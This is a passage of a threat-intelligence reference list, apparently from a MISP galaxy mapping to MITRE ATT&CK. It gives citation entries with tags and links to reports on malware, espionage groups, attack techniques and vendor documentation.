https://www.zscaler.com/blogs/security-research/technical-analysis-pikabot

Crowdstrike WhisperGate January 2022

Crowdstrike. (2022, January 19). Technical Analysis of the WhisperGate Malicious Bootloader. Retrieved March 10, 2022.

The tag is: misp-galaxy:references="Crowdstrike WhisperGate January 2022"

Table 15626. Table References

Links

https://www.crowdstrike.com/blog/technical-analysis-of-whispergate-malware

Apple TN2459 Kernel Extensions

Apple. (2018, April 19). Technical Note TN2459: User-Approved Kernel Extension Loading. Retrieved June 30, 2020.

The tag is: misp-galaxy:references="Apple TN2459 Kernel Extensions"

Table 15627. Table References

Links

https://developer.apple.com/library/archive/technotes/tn2459/_index.html

GovCERT Carbon May 2016

GovCERT. (2016, May 23). Technical Report about the Espionage Case at RUAG. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="GovCERT Carbon May 2016"

Table 15628. Table References

Links

https://web.archive.org/web/20170718174931/https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf

Palo Alto Office Test Sofacy

Falcone, R. (2016, July 20). Technical Walkthrough: Office Test Persistence Method Used In Recent Sofacy Attacks. Retrieved July 3, 2017.

The tag is: misp-galaxy:references="Palo Alto Office Test Sofacy"

Table 15629. Table References

Links

https://researchcenter.paloaltonetworks.com/2016/07/unit42-technical-walkthrough-office-test-persistence-method-used-in-recent-sofacy-attacks/

te.exe - LOLBAS Project

LOLBAS. (2018, May 25). te.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="te.exe - LOLBAS Project"

Table 15630. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/

ESET Telebots June 2017

Cherepanov, A. (2017, June 30). TeleBots are back: Supply chain attacks against Ukraine. Retrieved June 11, 2020.

The tag is: misp-galaxy:references="ESET Telebots June 2017"

Table 15631. Table References

Links

https://www.welivesecurity.com/2017/06/30/telebots-back-supply-chain-attacks-against-ukraine/

SANS Brian Wiltse Template Injection

Wiltse, B. (2018, November 7). Template Injection Attacks - Bypassing Security Controls by Living off the Land. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="SANS Brian Wiltse Template Injection"

Table 15632. Table References

Links

https://www.sans.org/reading-room/whitepapers/testing/template-injection-attacks-bypassing-security-controls-living-land-38780

Amazon AWS Temporary Security Credentials

Amazon. (n.d.). Temporary Security Credentials. Retrieved October 18, 2019.

The tag is: misp-galaxy:references="Amazon AWS Temporary Security Credentials"

Table 15633. Table References

Links

https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp.html

Elastic Process Injection July 2017

Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.

The tag is: misp-galaxy:references="Elastic Process Injection July 2017"

Table 15634. Table References

Links

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

TestWindowRemoteAgent.exe - LOLBAS Project

LOLBAS. (2023, August 21). TestWindowRemoteAgent.exe. Retrieved December 4, 2023.

The tag is: misp-galaxy:references="TestWindowRemoteAgent.exe - LOLBAS Project"

Table 15635. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Testwindowremoteagent/

Sygnia Elephant Beetle Jan 2022

Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.

The tag is: misp-galaxy:references="Sygnia Elephant Beetle Jan 2022"

Table 15636. Table References

Links

https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&hssc=147695848.1.1680005306711&hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d

Domain_Steal_CC

Krebs, B. (2018, November 13). That Domain You Forgot to Renew? Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.

The tag is: misp-galaxy:references="Domain_Steal_CC"

Table 15637. Table References

Links

https://krebsonsecurity.com/2018/11/that-domain-you-forgot-to-renew-yeah-its-now-stealing-credit-cards/

Kali Hydra

Kali. (2014, February 18). THC-Hydra. Retrieved November 2, 2017.

The tag is: misp-galaxy:references="Kali Hydra"

Table 15638. Table References

Links

https://tools.kali.org/password-attacks/hydra

Adventures of a Keystroke

Tinaztepe, E. (n.d.). The Adventures of a Keystroke: An in-depth look into keyloggers on Windows. Retrieved April 27, 2016.

The tag is: misp-galaxy:references="Adventures of a Keystroke"

Table 15639. Table References

Links

http://opensecuritytraining.info/Keylogging_files/The%20Adventures%20of%20a%20Keystroke.pdf

ThreatConnect Anthem

ThreatConnect Research Team. (2015, February 27). The Anthem Hack: All Roads Lead to China. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="ThreatConnect Anthem"

Table 15640. Table References

Links

https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/

Talos Cobalt Strike September 2020

Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.

The tag is: misp-galaxy:references="Talos Cobalt Strike September 2020"

Table 15641. Table References

Links

https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf

wardle chp2 persistence

Patrick Wardle. (2022, January 1). The Art of Mac Malware Volume 0x1: Analysis. Retrieved April 19, 2022.

The tag is: misp-galaxy:references="wardle chp2 persistence"

Table 15642. Table References

Links

https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf

wardle artofmalware volume1

Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume 0x1: Analysis. Retrieved March 19, 2021.

The tag is: misp-galaxy:references="wardle artofmalware volume1"

Table 15643. Table References

Links

https://taomm.org/vol1/pdfs.html

ArtOfMemoryForensics

Ligh, M.H. et al. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="ArtOfMemoryForensics"

STIG Audit Kernel Modules

Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules. Retrieved September 28, 2021.

The tag is: misp-galaxy:references="STIG Audit Kernel Modules"

Table 15644. Table References

Links

https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383

Medium Metamorfo Apr 2020

Erlich, C. (2020, April 3). The Avast Abuser: Metamorfo Banking Malware Hides By Abusing Avast Executable. Retrieved May 26, 2020.

The tag is: misp-galaxy:references="Medium Metamorfo Apr 2020"

Table 15645. Table References

Links

https://medium.com/@chenerlich/the-avast-abuser-metamorfo-banking-malware-hides-by-abusing-avast-executable-ac9b8b392767

Gigamon Berserk Bear October 2021

Slowik, J. (2021, October). THE BAFFLING BERSERK BEAR: A DECADE’S ACTIVITY TARGETING CRITICAL INFRASTRUCTURE. Retrieved December 6, 2021.

The tag is: misp-galaxy:references="Gigamon Berserk Bear October 2021"

Table 15646. Table References

Links

https://vblocalhost.com/uploads/VB2021-Slowik.pdf

Kaspersky Emotet Jan 2019

Shulmin, A. (2015, April 9). The Banking Trojan Emotet: Detailed Analysis. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Kaspersky Emotet Jan 2019"

Table 15647. Table References

Links

https://securelist.com/the-banking-trojan-emotet-detailed-analysis/69560/

Symantec Black Vine

DiMaggio, J. (2015, August 6). The Black Vine cyberespionage group. Retrieved January 26, 2016.

The tag is: misp-galaxy:references="Symantec Black Vine"

Table 15648. Table References

Links

https://web.archive.org/web/20170823094836/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-black-vine-cyberespionage-group.pdf

Group IB GrimAgent July 2021

Priego, A. (2021, July). THE BROTHERS GRIM: THE REVERSING TALE OF GRIMAGENT MALWARE USED BY RYUK. Retrieved July 16, 2021.

The tag is: misp-galaxy:references="Group IB GrimAgent July 2021"

Table 15649. Table References

Links

https://gibnc.group-ib.com/s/Group-IB_GrimAgent_analysis#pdfviewer

RSA Carbanak November 2017

RSA. (2017, November 21). THE CARBANAK/FIN7 SYNDICATE A HISTORICAL OVERVIEW OF AN EVOLVING THREAT. Retrieved July 29, 2020.

The tag is: misp-galaxy:references="RSA Carbanak November 2017"

Table 15650. Table References

Links

https://www.rsa.com/content/dam/en/white-paper/the-carbanak-fin7-syndicate.pdf

Picus Emotet Dec 2018

Özarslan, S. (2018, December 21). The Christmas Card you never wanted - A new wave of Emotet is back to wreak havoc. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Picus Emotet Dec 2018"

Table 15651. Table References

Links

https://www.picussecurity.com/blog/the-christmas-card-you-never-wanted-a-new-wave-of-emotet-is-back-to-wreak-havoc.html

Medium Ali Salem Bumblebee April 2022

Salem, A. (2022, April 27). The chronicles of Bumblebee: The Hook, the Bee, and the Trickbot connection. Retrieved September 2, 2022.

The tag is: misp-galaxy:references="Medium Ali Salem Bumblebee April 2022"

Table 15652. Table References

Links

https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056

MSDN COM Elevation

Microsoft. (n.d.). The COM Elevation Moniker. Retrieved July 26, 2016.

The tag is: misp-galaxy:references="MSDN COM Elevation"

Table 15653. Table References

Links

https://msdn.microsoft.com/en-us/library/ms679687.aspx

Microsoft Component Object Model

Microsoft. (n.d.). The Component Object Model. Retrieved August 18, 2016.

The tag is: misp-galaxy:references="Microsoft Component Object Model"

Table 15654. Table References

Links

https://msdn.microsoft.com/library/ms694363.aspx

SANS Conficker

Burton, K. (n.d.). The Conficker Worm. Retrieved February 18, 2021.

The tag is: misp-galaxy:references="SANS Conficker"

Table 15655. Table References

Links

https://web.archive.org/web/20200125132645/https://www.sans.org/security-resources/malwarefaq/conficker-worm

Symantec DDoS October 2014

Wueest, C. (2014, October 21). The continued rise of DDoS attacks. Retrieved April 24, 2019.

The tag is: misp-galaxy:references="Symantec DDoS October 2014"

Table 15656. Table References

Links

https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-continued-rise-of-ddos-attacks.pdf

BlackBerry CostaRicto November 2020

The BlackBerry Research and Intelligence Team. (2020, November 12). The CostaRicto Campaign: Cyber-Espionage Outsourced. Retrieved May 24, 2021.

The tag is: misp-galaxy:references="BlackBerry CostaRicto November 2020"

Table 15657. Table References

Links

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

SecureWorks Mia Ash July 2017

Counter Threat Unit Research Team. (2017, July 27). The Curious Case of Mia Ash: Fake Persona Lures Middle Eastern Targets. Retrieved February 26, 2018.

The tag is: misp-galaxy:references="SecureWorks Mia Ash July 2017"

Table 15658. Table References

Links

https://www.secureworks.com/research/the-curious-case-of-mia-ash

Trustwave IIS Module 2013

Grunzweig, J. (2013, December 9). The Curious Case of the Malicious IIS Module. Retrieved June 3, 2021.

The tag is: misp-galaxy:references="Trustwave IIS Module 2013"

Table 15659. Table References

Links

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/

CloudSploit - Unused AWS Regions

CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.

The tag is: misp-galaxy:references="CloudSploit - Unused AWS Regions"

Table 15660. Table References

Links

https://blog.cloudsploit.com/the-danger-of-unused-aws-regions-af0bf1b878fc

Dormann Dangers of VHD 2019

Dormann, W. (2019, September 4). The Dangers of VHD and VHDX Files. Retrieved March 16, 2021.

The tag is: misp-galaxy:references="Dormann Dangers of VHD 2019"

Table 15661. Table References

Links

https://insights.sei.cmu.edu/cert/2019/09/the-dangers-of-vhd-and-vhdx-files.html

Kaspersky Darkhotel

Kaspersky Lab’s Global Research and Analysis Team. (2014, November). The Darkhotel APT A Story of Unusual Hospitality. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Kaspersky Darkhotel"

Table 15662. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070903/darkhotel_kl_07.11.pdf

ESET ForSSHe December 2018

Dumont, R., M.Léveillé, M., Porcher, H. (2018, December 1). THE DARK SIDE OF THE FORSSHE A landscape of OpenSSH backdoors. Retrieved July 16, 2020.

The tag is: misp-galaxy:references="ESET ForSSHe December 2018"

Table 15663. Table References

Links

https://www.welivesecurity.com/wp-content/uploads/2018/12/ESET-The_Dark_Side_of_the_ForSSHe.pdf

Securelist Dropping Elephant

Kaspersky Lab’s Global Research & Analysis Team. (2016, July 8). The Dropping Elephant – aggressive cyber-espionage in the Asian region. Retrieved August 3, 2016.

The tag is: misp-galaxy:references="Securelist Dropping Elephant"

Table 15664. Table References

Links

https://securelist.com/the-dropping-elephant-actor/75328/

F-Secure The Dukes

F-Secure Labs. (2015, September 17). The Dukes: 7 years of Russian cyberespionage. Retrieved December 10, 2015.

The tag is: misp-galaxy:references="F-Secure The Dukes"

Table 15665. Table References

Links

https://www.f-secure.com/documents/996508/1030745/dukes_whitepaper.pdf

Kaspersky Duqu 2.0

Kaspersky Lab. (2015, June 11). The Duqu 2.0. Retrieved April 21, 2017.

The tag is: misp-galaxy:references="Kaspersky Duqu 2.0"

Table 15666. Table References

Links

https://securelist.com/files/2015/06/The_Mystery_of_Duqu_2_0_a_sophisticated_cyberespionage_actor_returns.pdf

Symantec Elderwood Sept 2012

O’Gorman, G., and McDonald, G. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018.

The tag is: misp-galaxy:references="Symantec Elderwood Sept 2012"

Table 15667. Table References

Links

https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf

Kaspersky Turla Aug 2014

Kaspersky Lab’s Global Research & Analysis Team. (2014, August 06). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroboros. Retrieved November 7, 2018.

The tag is: misp-galaxy:references="Kaspersky Turla Aug 2014"

Table 15668. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf

Kaspersky Turla

Kaspersky Lab’s Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.

The tag is: misp-galaxy:references="Kaspersky Turla"

Table 15669. Table References

Links

https://securelist.com/the-epic-turla-operation/65545/

FireEye EPS Awakens Part 2

Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.

The tag is: misp-galaxy:references="FireEye EPS Awakens Part 2"

Table 15670. Table References

Links

https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html

Symantec Emotet Jul 2018

Symantec. (2018, July 18). The Evolution of Emotet: From Banking Trojan to Threat Distributor. Retrieved March 25, 2019.

The tag is: misp-galaxy:references="Symantec Emotet Jul 2018"

Table 15671. Table References

Links

https://www.symantec.com/blogs/threat-intelligence/evolution-emotet-trojan-distributor

SilentBreak Offensive PS Dec 2015

Christensen, L. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.

The tag is: misp-galaxy:references="SilentBreak Offensive PS Dec 2015"

Table 15672. Table References

Links

https://web.archive.org/web/20190508170150/https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/

CrowdStrike Evolution of Pinchy Spider July 2021

Meyers, Adam. (2021, July 6). The Evolution of PINCHY SPIDER from GandCrab to REvil. Retrieved March 28, 2023.

The tag is: misp-galaxy:references="CrowdStrike Evolution of Pinchy Spider July 2021"

Table 15673. Table References

Links

https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/

Proofpoint Ransomware Initial Access June 2021

Selena Larson, Daniel Blackford, Garrett G. (2021, June 16). The First Step: Initial Access Leads to Ransomware. Retrieved January 24, 2024.

The tag is: misp-galaxy:references="Proofpoint Ransomware Initial Access June 2021"

Table 15674. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware

Kaspersky Flame

Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Kaspersky Flame"

Table 15675. Table References

Links

https://securelist.com/the-flame-questions-and-answers-51/34344/

Unit 42 CARROTBAT November 2018

Grunzweig, J. and Wilhoit, K. (2018, November 29). The Fractured Block Campaign: CARROTBAT Used to Deliver Malware Targeting Southeast Asia. Retrieved June 2, 2020.

The tag is: misp-galaxy:references="Unit 42 CARROTBAT November 2018"

Table 15676. Table References

Links

https://unit42.paloaltonetworks.com/unit42-the-fractured-block-campaign-carrotbat-malware-used-to-deliver-malware-targeting-southeast-asia/

Palo Alto Gamaredon Feb 2017

Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.

The tag is: misp-galaxy:references="Palo Alto Gamaredon Feb 2017"

Table 15677. Table References

Links

https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/

GNU Acct

GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.

The tag is: misp-galaxy:references="GNU Acct"

Table 15678. Table References

Links

https://www.gnu.org/software/acct/

GLIBC

glibc developer community. (2020, February 1). The GNU C Library (glibc). Retrieved June 25, 2020.

The tag is: misp-galaxy:references="GLIBC"

Table 15679. Table References

Links

https://www.gnu.org/software/libc/

Trustwave GoldenSpy June 2020

Trustwave SpiderLabs. (2020, June 25). The Golden Tax Department and Emergence of GoldenSpy Malware. Retrieved July 23, 2020.

The tag is: misp-galaxy:references="Trustwave GoldenSpy June 2020"

Table 15680. Table References

Links

https://www.trustwave.com/en-us/resources/library/documents/the-golden-tax-department-and-the-emergence-of-goldenspy-malware/

Proofpoint TA416 Europe March 2022

Raggi, M. et al. (2022, March 7). The Good, the Bad, and the Web Bug: TA416 Increases Operational Tempo Against European Governments as Conflict in Ukraine Escalates. Retrieved March 16, 2022.

The tag is: misp-galaxy:references="Proofpoint TA416 Europe March 2022"

Table 15681. Table References

Links

https://www.proofpoint.com/us/blog/threat-insight/good-bad-and-web-bug-ta416-increases-operational-tempo-against-european

Unit 42 Gorgon Group Aug 2018

Falcone, R., et al. (2018, August 02). The Gorgon Group: Slithering Between Nation State and Cybercrime. Retrieved August 7, 2018.

The tag is: misp-galaxy:references="Unit 42 Gorgon Group Aug 2018"

Table 15682. Table References

Links

https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/

Trend Micro HeartBeat Campaign January 2013

Roland Dela Paz. (2003, January 3). The HeartBeat APT Campaign. Retrieved October 17, 2021.

The tag is: misp-galaxy:references="Trend Micro HeartBeat Campaign January 2013"

Table 15683. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp_the-heartbeat-apt-campaign.pdf?

FireEye Hikit Rootkit

Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.

The tag is: misp-galaxy:references="FireEye Hikit Rootkit"

Table 15684. Table References

Links

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

FireEye HIKIT Rootkit Part 2

Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020.

The tag is: misp-galaxy:references="FireEye HIKIT Rootkit Part 2"

Table 15685. Table References

Links

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html

Proofpoint Human Factor

Proofpoint. (n.d.). The Human Factor 2023: Analyzing the cyber attack chain. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="Proofpoint Human Factor"

Table 15686. Table References

Links

https://www.proofpoint.com/sites/default/files/threat-reports/pfpt-us-tr-human-factor-report.pdf

TechNet Blogs Credential Protection

Wilson, B. (2016, April 18). The Importance of KB2871997 and KB2928120 for Credential Protection. Retrieved April 11, 2018.

The tag is: misp-galaxy:references="TechNet Blogs Credential Protection"

Table 15687. Table References

Links

https://blogs.technet.microsoft.com/askpfeplat/2016/04/18/the-importance-of-kb2871997-and-kb2928120-for-credential-protection/

dhs_threat_to_net_devices

U.S. Department of Homeland Security. (2016, August 30). The Increasing Threat to Network Infrastructure Devices and Recommended Mitigations. Retrieved July 29, 2022.

The tag is: misp-galaxy:references="dhs_threat_to_net_devices"

Table 15688. Table References

Links

https://cyber.dhs.gov/assets/report/ar-16-20173.pdf

PWC KeyBoys Feb 2017

Parys, B. (2017, February 11). The KeyBoys are back in town. Retrieved June 13, 2019.

The tag is: misp-galaxy:references="PWC KeyBoys Feb 2017"

Table 15689. Table References

Links

https://web.archive.org/web/20211129064701/https://www.pwc.co.uk/issues/cyber-security-services/research/the-keyboys-are-back-in-town.html

Securelist Kimsuky Sept 2013

Tarakanov, D. (2013, September 11). The “Kimsuky” Operation: A North Korean APT? Retrieved August 13, 2019.

The tag is: misp-galaxy:references="Securelist Kimsuky Sept 2013"

Table 15690. Table References

Links

https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/

ClearSky Kittens Back 2 Oct 2019

ClearSky Research Team. (2019, October 1). The Kittens Are Back in Town 2 - Charming Kitten Campaign Keeps Going on, Using New Impersonation Methods. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="ClearSky Kittens Back 2 Oct 2019"

Table 15691. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2019/10/The-Kittens-Are-Back-in-Town-2-1.pdf

ClearSky Kittens Back 3 August 2020

ClearSky Research Team. (2020, August 1). The Kittens Are Back in Town 3 - Charming Kitten Campaign Evolved and Deploying Spear-Phishing link by WhatsApp. Retrieved April 21, 2021.

The tag is: misp-galaxy:references="ClearSky Kittens Back 3 August 2020"

Table 15692. Table References

Links

https://www.clearskysec.com/wp-content/uploads/2020/08/The-Kittens-are-Back-in-Town-3.pdf

Kubernetes API

The Kubernetes Authors. (n.d.). The Kubernetes API. Retrieved March 29, 2021.

The tag is: misp-galaxy:references="Kubernetes API"

Table 15693. Table References

Links

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

GitHub LaZagne Dec 2018

Zanni, A. (n.d.). The LaZagne Project !!! Retrieved December 14, 2018.

The tag is: misp-galaxy:references="GitHub LaZagne Dec 2018"

Table 15694. Table References

Links

https://github.com/AlessandroZ/LaZagne

Dell P2P ZeuS

SecureWorks. (2013). The Lifecycle of Peer-to-Peer (Gameover) ZeuS. Retrieved August 19, 2015.

The tag is: misp-galaxy:references="Dell P2P ZeuS"

Table 15695. Table References

Links

http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

Linux Kernel API

Linux Kernel Organization, Inc. (n.d.). The Linux Kernel API. Retrieved June 25, 2020.

The tag is: misp-galaxy:references="Linux Kernel API"

Table 15696. Table References

Links

https://www.kernel.org/doc/html/v4.12/core-api/kernel-api.html

Linux Kernel Programming

Pomerantz, O., Salzman, P. (2003, April 4). The Linux Kernel Module Programming Guide. Retrieved April 6, 2018.

The tag is: misp-galaxy:references="Linux Kernel Programming"

Table 15697. Table References

Links

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

Villeneuve 2011

Villeneuve, N., Sancho, D. (2011). THE “LURID” DOWNLOADER. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Villeneuve 2011"

Table 15698. Table References

Links

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_dissecting-lurid-apt.pdf

Microsoft BlackCat Jun 2022

Microsoft Defender Threat Intelligence. (2022, June 13). The many lives of BlackCat ransomware. Retrieved December 20, 2022.

The tag is: misp-galaxy:references="Microsoft BlackCat Jun 2022"

Table 15699. Table References

Links

https://www.microsoft.com/en-us/security/blog/2022/06/13/the-many-lives-of-blackcat-ransomware/

Talos Nyetya MEDoc 2017

Maynor, D., Nikolic, A., Olney, M., and Younan, Y. (2017, July 5). The MeDoc Connection. Retrieved March 26, 2019.

The tag is: misp-galaxy:references="Talos Nyetya MEDoc 2017"

Table 15700. Table References

Links

https://blog.talosintelligence.com/2017/07/the-medoc-connection.html

PegasusCitizenLab

Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.

The tag is: misp-galaxy:references="PegasusCitizenLab"

Table 15701. Table References

Links

https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

Securelist MiniDuke Feb 2013

Kaspersky Lab’s Global Research & Analysis Team. (2013, February 27). The MiniDuke Mystery: PDF 0-day Government Spy Assembler 0x29A Micro Backdoor. Retrieved April 5, 2017.

The tag is: misp-galaxy:references="Securelist MiniDuke Feb 2013"

Table 15702. Table References

Links

https://cdn.securelist.com/files/2014/07/themysteryofthepdf0-dayassemblermicrobackdoor.pdf

Harmj0y SeEnableDelegationPrivilege Right

Schroeder, W. (2017, January 10). The Most Dangerous User Right You (Probably) Have Never Heard Of. Retrieved March 5, 2019.

The tag is: misp-galaxy:references="Harmj0y SeEnableDelegationPrivilege Right"

Table 15703. Table References

Links

http://www.harmj0y.net/blog/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/

Baumgartner Naikon 2015

Baumgartner, K., Golovkin, M. (2015, May). The MsnMM Campaigns: The Earliest Naikon APT Campaigns. Retrieved April 10, 2019.

The tag is: misp-galaxy:references="Baumgartner Naikon 2015"

Table 15704. Table References

Links

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf

SentinelLabs Metador Sept 2022

Ehrlich, A., et al. (2022, September). THE MYSTERY OF METADOR | AN UNATTRIBUTED THREAT HIDING IN TELCOS, ISPS, AND UNIVERSITIES. Retrieved January 23, 2023.

The tag is: misp-galaxy:references="SentinelLabs Metador Sept 2022"

Table 15705. Table References

Links

https://assets.sentinelone.com/sentinellabs22/metador#page=1

Baumgartner Golovkin Naikon 2015

Baumgartner, K., Golovkin, M. (2015, May 14). The Naikon APT. Retrieved January 14, 2015.

The tag is: misp-galaxy:references="Baumgartner Golovkin Naikon 2015"

Table 15706. Table References

Links

https://securelist.com/the-naikon-apt/69953/

Cofense NanoCore Mar 2018

Patel, K. (2018, March 02). The NanoCore RAT Has Resurfaced From the Sewers. Retrieved November 9, 2018.

The tag is: misp-galaxy:references="Cofense NanoCore Mar 2018"

Table 15707. Table References

Links

https://cofense.com/nanocore-rat-resurfaced-sewers/

Kaspersky NetTraveler

Kaspersky Lab’s Global Research and Analysis Team. (n.d.). The NetTraveler (aka ‘Travnet’). Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Kaspersky NetTraveler"

Table 15708. Table References

Links

http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf

Unit42 OceanLotus 2017

Erye Hernandez and Danny Tsechansky. (2017, June 22). The New and Improved macOS Backdoor from OceanLotus. Retrieved September 8, 2023.

The tag is: misp-galaxy:references="Unit42 OceanLotus 2017"

Table 15709. Table References

Links

https://unit42.paloaltonetworks.com/unit42-new-improved-macos-backdoor-oceanlotus/

CyberArk Labs Discord

CyberArk Labs. (2023, April 13). The (Not so) Secret War on Discord. Retrieved July 20, 2023.

The tag is: misp-galaxy:references="CyberArk Labs Discord"

Table 15710. Table References

Links

https://www.cyberark.com/resources/threat-research-blog/the-not-so-secret-war-on-discord

Gh0stRAT ATT March 2019

Quinn, J. (2019, March 25). The odd case of a Gh0stRAT variant. Retrieved July 15, 2020.

The tag is: misp-galaxy:references="Gh0stRAT ATT March 2019"

Table 15711. Table References

Links

https://cybersecurity.att.com/blogs/labs-research/the-odd-case-of-a-gh0strat-variant

Palo Alto OilRig May 2016

Falcone, R. and Lee, B. (2016, May 26). The OilRig Campaign: Attacks on Saudi Arabian Organizations Deliver Helminth Backdoor. Retrieved May 3, 2017.

The tag is: misp-galaxy:references="Palo Alto OilRig May 2016"

Table 15712. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/

STIG krbtgt reset

UCF. (n.d.). The password for the krbtgt account on a domain must be reset at least every 180 days. Retrieved November 5, 2020.

The tag is: misp-galaxy:references="STIG krbtgt reset"

Table 15713. Table References

Links

https://www.stigviewer.com/stig/windows_server_2016/2019-12-12/finding/V-91779

Haq 2014

Haq, T., Moran, N., Scott, M., & Vashisht, S. O. (2014, September 10). The Path to Mass-Producing Cyber Attacks [Blog]. Retrieved November 12, 2014.

The tag is: misp-galaxy:references="Haq 2014"

Table 15714. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/09/the-path-to-mass-producing-cyber-attacks.html

Kaspersky Turla Penquin December 2014

Baumgartner, K. and Raiu, C. (2014, December 8). The ‘Penquin’ Turla. Retrieved March 11, 2021.

The tag is: misp-galaxy:references="Kaspersky Turla Penquin December 2014"

Table 15715. Table References

Links

https://securelist.com/the-penquin-turla-2/67962/

FireEye PLA

FireEye Labs. (2014, May 20). The PLA and the 8:00am-5:00pm Work Day: FireEye Confirms DOJ’s Findings on APT1 Intrusion Activity. Retrieved November 4, 2014.

The tag is: misp-galaxy:references="FireEye PLA"

Table 15716. Table References

Links

https://www.fireeye.com/blog/threat-research/2014/05/the-pla-and-the-800am-500pm-work-day-fireeye-confirms-dojs-findings-on-apt1-intrusion-activity.html

Kaspersky ProjectSauron Full Report

Kaspersky Lab’s Global Research & Analysis Team. (2016, August 9). The ProjectSauron APT. Retrieved August 17, 2016.

